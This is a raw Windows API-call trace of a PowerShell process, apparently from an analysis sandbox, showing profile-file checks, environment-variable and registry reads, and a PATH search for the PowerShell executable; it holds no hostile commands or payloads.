	[0625.494] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ed4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0625.494] CoTaskMemAlloc (cb=0x20c) returned 0x1b9ab970
	[0625.494] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b9ab970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0625.494] CoTaskMemFree (pv=0x1b9ab970) 
	[0625.494] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ed4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0625.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0625.497] SetErrorMode (uMode=0x1) returned 0x1
	[0625.498] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed860 | out: lpFileInformation=0x1ed860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0625.498] SetErrorMode (uMode=0x1) returned 0x1
	[0625.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0625.498] SetErrorMode (uMode=0x1) returned 0x1
	[0625.498] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed860 | out: lpFileInformation=0x1ed860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0625.498] SetErrorMode (uMode=0x1) returned 0x1
	[0625.498] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0625.498] SetErrorMode (uMode=0x1) returned 0x1
	[0625.498] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed860 | out: lpFileInformation=0x1ed860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0625.499] SetErrorMode (uMode=0x1) returned 0x1
	[0625.499] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0625.499] SetErrorMode (uMode=0x1) returned 0x1
	[0625.499] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed860 | out: lpFileInformation=0x1ed860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0625.499] SetErrorMode (uMode=0x1) returned 0x1
	[0626.412] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0626.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.412] CoTaskMemFree (pv=0x40a560) 
	[0626.413] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0626.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.414] CoTaskMemFree (pv=0x40a560) 
	[0626.416] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0626.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.416] CoTaskMemFree (pv=0x40a560) 
	[0626.419] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0626.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.419] CoTaskMemFree (pv=0x40a560) 
	[0626.428] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0626.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.428] CoTaskMemFree (pv=0x40a560) 
	[0626.429] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x38c
	[0626.430] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2f8
	[0626.430] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc
	[0626.430] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314
	[0626.430] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e4
	[0626.430] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2e8
	[0626.430] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0626.430] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0626.430] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0626.430] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x390
	[0626.430] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0626.430] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0626.433] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0626.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.433] CoTaskMemFree (pv=0x40a560) 
	[0626.436] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0626.437] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1eda40 | out: lpMode=0x1eda40) returned 1
	[0626.438] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0626.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.439] CoTaskMemFree (pv=0x40a560) 
	[0626.446] SetEvent (hEvent=0x314) returned 1
	[0626.446] SetEvent (hEvent=0x38c) returned 1
	[0626.446] SetEvent (hEvent=0x2f8) returned 1
	[0626.446] SetEvent (hEvent=0x2fc) returned 1
	[0626.446] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0626.448] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0626.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.448] CoTaskMemFree (pv=0x40a560) 
	[0626.449] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed798 | out: phkResult=0x1ed798*=0x34c) returned 0x0
	[0626.449] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ed71c, lpData=0x0, lpcbData=0x1ed718*=0x0 | out: lpType=0x1ed71c*=0x0, lpData=0x0, lpcbData=0x1ed718*=0x0) returned 0x2

Thread:
	id = 425
	os_tid = 0x1090


Thread:
	id = 428
	os_tid = 0x109c


Thread:
	id = 841
	os_tid = 0x1250


Thread:
	id = 849
	os_tid = 0x1794


Thread:
	id = 856
	os_tid = 0x1334


Thread:
	id = 887
	os_tid = 0x11e4


Thread:
	id = 898
	os_tid = 0x224

	[0485.201] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0575.753] LocalFree (hMem=0x367290) returned 0x0
	[0575.753] CloseHandle (hObject=0x314) returned 1
	[0575.753] CloseHandle (hObject=0x13) returned 1
	[0575.754] CloseHandle (hObject=0xf) returned 1
	[0575.755] RegCloseKey (hKey=0x2fc) returned 0x0
	[0575.755] RegCloseKey (hKey=0x2f8) returned 0x0
	[0575.755] RegCloseKey (hKey=0x2f4) returned 0x0
	[0575.755] LocalFree (hMem=0x3672e0) returned 0x0
	[0575.755] RegCloseKey (hKey=0x324) returned 0x0
	[0593.321] RegCloseKey (hKey=0x324) returned 0x0
	[0605.355] RegCloseKey (hKey=0x324) returned 0x0
	[0617.284] RegCloseKey (hKey=0x388) returned 0x0
	[0617.284] RegCloseKey (hKey=0x384) returned 0x0
	[0617.284] RegCloseKey (hKey=0x360) returned 0x0
	[0617.285] RegCloseKey (hKey=0x39c) returned 0x0
	[0617.285] RegCloseKey (hKey=0x37c) returned 0x0
	[0617.285] RegCloseKey (hKey=0x378) returned 0x0
	[0617.286] RegCloseKey (hKey=0x374) returned 0x0
	[0617.286] RegCloseKey (hKey=0x370) returned 0x0
	[0617.286] RegCloseKey (hKey=0x36c) returned 0x0
	[0617.286] RegCloseKey (hKey=0x368) returned 0x0
	[0617.287] RegCloseKey (hKey=0x364) returned 0x0
	[0617.287] RegCloseKey (hKey=0x33c) returned 0x0
	[0617.287] RegCloseKey (hKey=0x398) returned 0x0
	[0617.287] RegCloseKey (hKey=0x394) returned 0x0
	[0617.288] RegCloseKey (hKey=0x35c) returned 0x0
	[0617.288] RegCloseKey (hKey=0x358) returned 0x0
	[0617.288] RegCloseKey (hKey=0x354) returned 0x0
	[0617.288] RegCloseKey (hKey=0x350) returned 0x0
	[0617.289] RegCloseKey (hKey=0x34c) returned 0x0
	[0617.289] RegCloseKey (hKey=0x348) returned 0x0
	[0617.289] RegCloseKey (hKey=0x344) returned 0x0
	[0617.290] RegCloseKey (hKey=0x340) returned 0x0
	[0617.290] RegCloseKey (hKey=0x390) returned 0x0
	[0617.290] RegCloseKey (hKey=0x330) returned 0x0
	[0617.290] RegCloseKey (hKey=0x32c) returned 0x0
	[0617.291] RegCloseKey (hKey=0x328) returned 0x0
	[0617.291] RegCloseKey (hKey=0x2e8) returned 0x0
	[0617.291] RegCloseKey (hKey=0x2e4) returned 0x0
	[0617.291] RegCloseKey (hKey=0x314) returned 0x0
	[0617.292] RegCloseKey (hKey=0x2fc) returned 0x0
	[0617.292] RegCloseKey (hKey=0x2f8) returned 0x0
	[0617.292] RegCloseKey (hKey=0x38c) returned 0x0
	[0617.292] RegCloseKey (hKey=0x324) returned 0x0
	[0641.248] RegCloseKey (hKey=0x34c) returned 0x0

Thread:
	id = 937
	os_tid = 0x1918


Thread:
	id = 1240
	os_tid = 0x146c

	[0628.183] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0628.188] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0628.193] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0628.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.193] CoTaskMemFree (pv=0x40a560) 
	[0628.195] VirtualQuery (in: lpAddress=0x1c84d760, lpBuffer=0x1c84e620, dwLength=0x30 | out: lpBuffer=0x1c84e620*(BaseAddress=0x1c84d000, AllocationBase=0x1bec0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0628.198] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0628.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.198] CoTaskMemFree (pv=0x40a560) 
	[0628.200] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0628.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.200] CoTaskMemFree (pv=0x40a560) 
	[0628.203] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0628.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.204] CoTaskMemFree (pv=0x40a560) 
	[0628.939] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0628.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.939] CoTaskMemFree (pv=0x40a560) 
	[0628.941] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0628.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.941] CoTaskMemFree (pv=0x40a560) 
	[0628.943] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0628.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.943] CoTaskMemFree (pv=0x40a560) 
	[0628.948] VirtualQuery (in: lpAddress=0x1c84da10, lpBuffer=0x1c84e8d0, dwLength=0x30 | out: lpBuffer=0x1c84e8d0*(BaseAddress=0x1c84d000, AllocationBase=0x1bec0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0628.949] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0628.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.949] CoTaskMemFree (pv=0x40a560) 
	[0628.952] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0628.952] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.952] CoTaskMemFree (pv=0x40a560) 
	[0628.952] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0628.952] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.952] CoTaskMemFree (pv=0x40a560) 
	[0628.954] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0628.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.954] CoTaskMemFree (pv=0x40a560) 
	[0628.958] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0628.958] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.959] CoTaskMemFree (pv=0x40a560) 
	[0630.088] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0630.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0630.088] CoTaskMemFree (pv=0x40a560) 
	[0632.991] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0632.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0632.991] CoTaskMemFree (pv=0x40a560) 
	[0632.996] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0632.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0632.996] CoTaskMemFree (pv=0x40a560) 
	[0632.999] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0632.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0632.999] CoTaskMemFree (pv=0x40a560) 
	[0633.001] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0633.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0633.001] CoTaskMemFree (pv=0x40a560) 
	[0633.003] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0633.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0633.003] CoTaskMemFree (pv=0x40a560) 
	[0633.005] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0633.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0633.005] CoTaskMemFree (pv=0x40a560) 
	[0633.025] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0633.025] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0633.025] CoTaskMemFree (pv=0x40a560) 
	[0637.026] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0637.026] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0637.026] CoTaskMemFree (pv=0x40a560) 
	[0637.029] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0637.029] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0637.029] CoTaskMemFree (pv=0x40a560) 
	[0637.029] CoTaskMemAlloc (cb=0x128) returned 0x4164f0
	[0637.029] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4164f0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0637.029] CoTaskMemFree (pv=0x4164f0) 
	[0637.034] CoTaskMemAlloc (cb=0x20e) returned 0x1b9ad5e0
	[0637.034] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b9ad5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0637.034] CoTaskMemFree (pv=0x1b9ad5e0) 
	[0637.037] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0637.038] SetErrorMode (uMode=0x1) returned 0x1
	[0637.041] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0638.641] SetErrorMode (uMode=0x1) returned 0x1
	[0638.642] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0638.642] SetErrorMode (uMode=0x1) returned 0x1
	[0638.642] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0638.651] SetErrorMode (uMode=0x1) returned 0x1
	[0638.652] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0638.653] SetErrorMode (uMode=0x1) returned 0x1
	[0638.653] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0638.661] SetErrorMode (uMode=0x1) returned 0x1
	[0638.662] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0638.662] SetErrorMode (uMode=0x1) returned 0x1
	[0638.663] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0640.543] SetErrorMode (uMode=0x1) returned 0x1
	[0640.545] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0640.545] SetErrorMode (uMode=0x1) returned 0x1
	[0640.545] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0640.553] SetErrorMode (uMode=0x1) returned 0x1
	[0640.555] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0640.555] SetErrorMode (uMode=0x1) returned 0x1
	[0640.555] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0640.564] SetErrorMode (uMode=0x1) returned 0x1
	[0640.565] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0640.565] SetErrorMode (uMode=0x1) returned 0x1
	[0640.565] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0640.573] SetErrorMode (uMode=0x1) returned 0x1
	[0640.575] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0640.575] SetErrorMode (uMode=0x1) returned 0x1
